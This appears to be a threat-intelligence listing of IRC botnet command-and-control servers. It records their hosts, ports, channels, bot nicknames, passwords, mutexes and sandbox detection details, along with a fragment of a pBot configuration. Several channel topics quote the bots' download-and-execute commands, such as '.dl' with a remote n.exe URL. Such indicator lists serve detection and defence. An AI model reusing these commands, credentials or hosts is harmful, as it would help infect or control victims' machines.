ktodumal.net(32k net)

ktodumal.net 85.12.60.20 C&C Server: 85.12.60.20:81 Server Password: Username: n Nickname: n[DEU|XP]0949985 Channel: #new# (Password: ) Channeltopic: :.im http://www.veyrandon-camions-magasins.fr/img/fotos.php?foto=IMG020407202010.JPG Now talking in #inf# Topic is ‘.dl http://veyrandon-camions-magasins.fr/admin/n.exe’ Set by s on Thu Apr 22 05:11:24 also chanel :#newgen# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe:*:Enabled:Windows Control

class pBot

server”=>”218.226.193.174″, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”##xp#”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”stop”, // “trigger”=>”!say@”, “hostauth”=>”*” // *

MicrosoftUpdate.yi.org

[ DetectionInfo ] * Filename: C:analyzerscansvcnost.exe. * Sandbox name: W32/Backdoor. * Signature name: Ircbot.BAYQ. * Compressed: NO. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * File length: 73728 bytes. * MD5 hash: a9bfb1db9d131e1bcce5b8f1f3132871. * SHA1 hash: e7e8d1ce421b418a31180beb25a3e758265ea9c7. * Entry-point detection: Microsoft Visual

irc.x2.al

Server irc.x2.al [Berisha)] Connecting to 88.84.190.62 (4243) Modded by MrAnToN e-mail mranton@hotmail.de -Anton@Berisha.info

wmim.solutionofmsn.org

Remote Host Port Number wmim.solutionofmsn.org 1234 NICK {NEW}[USA][XP-SP2]074959 USER 1231 “” “lol” :1231 JOIN #b# NICK [USA][XP-SP2]339973 USER 0146 “” “lol” :0146 Other details * To mark the presence in the system, the following Mutex object was created: o kOiJjfhjtgK * The following port was open in the system: Port Protocol Process 1036 TCP msnms.exe

vunrestrained.dyndns.info

Remote Host Port Number vunrestrained.dyndns.info 51987 NICK Unrestrained-331897 USER ercmoxzx 0 0 :Unrestrained-331897 USERHOST Unrestrained-331897 MODE Unrestrained-331897 -x+B JOIN #Hydra# NICK Unrestrained-231953 USER ixuzpou 0 0 :Unrestrained-231953 USERHOST Unrestrained-231953 MODE Unrestrained-231953 -x+B NICK Unrestrained-465848 USER adwosov 0 0 :Unrestrained-465848 USERHOST Unrestrained-465848 MODE Unrestrained-465848 -x+B Other details * To mark the presence in the system, the

ds32v7k3.knaqu.eu

Remote Host Port Number ds32v7k3.knaqu.eu 4244 PASS letmein NICK [00|USA|492973] USER XP-1626 * 0 :COMPUTERNAME * To mark the presence in the system, the following Mutex object was created: o LiNbagGgsag * The following ports were open in the system: Port Protocol Process 1033 TCP F1reFox32.exe (%Windir%F1reFox32.exe) 1034 TCP f1refox32.exe (%Windir%f1refox32.exe) * The following Host

92.241.190.166

92.241.190.166:81 Server : srv.apache.net Now talking in #final# Topic On: [ #final# ] [ , ] Topic By: [ s ] s for SnK kak pazhivajesh kolega lol

spy.burimche.net

Remote Host Port Number spy.burimche.net 1111 NICK UserName15 USER UserName15 “hotmail.com” “spy.burimche.net” :UserName Other details * To mark the presence in the system, the following Mutex object was created: o d3st0y * The following ports were open in the system: Port Protocol Process 113 TCP [file and pathname of the sample #1] 1033 TCP [file

bb.milan-fans.com

Remote Host Port Number bb.milan-fans.com 1234 NICK n[USA|XP]6675103 USER 3281 “” “lol” :3281 JOIN #cc# NICK [USA|XP]6816119 USER 7658 “” “lol” :7658 To mark the presence in the system, the following Mutex object was created: SLKJSN848L The following ports were open in the system: Port Protocol Process 1034 TCP msnmgr.exe (%Windir%msnmgr.exe) 1036 TCP msnmgr.exe (%Windir%msnmgr.exe)